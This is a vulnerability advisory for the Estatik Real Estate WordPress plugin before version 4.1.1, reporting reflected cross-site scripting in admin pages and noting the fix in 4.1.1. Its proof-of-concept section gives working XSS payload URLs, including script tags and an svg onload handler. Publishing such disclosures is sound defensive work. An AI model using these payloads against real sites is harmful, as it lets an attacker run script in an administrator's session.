WordPress Plugin Vulnerabilities

Estatik Real Estate Plugin < 4.1.1 - Reflected XSS

Description

The plugin does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open one of the URLs below (some require that at least one property exist in the plugin):

https://example.com/wp-admin/edit.php?post_type=properties&"><script>alert`XSS`</script>

https://example.com/wp-admin/edit.php?post_type=properties&order="><svg/onload=alert(/XSS/)> (other affected parameter: orderby)

https://example.com/wp-admin/admin.php?page=es_demo&"><script>alert`XSS`</script>

Affects Plugins

Fixed in 4.1.1

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes

Timeline

Publicly Published
2023-12-25 (about 4 months ago)
Added
2023-12-25 (about 4 months ago)
Last Updated
2023-12-25 (about 4 months ago)

Other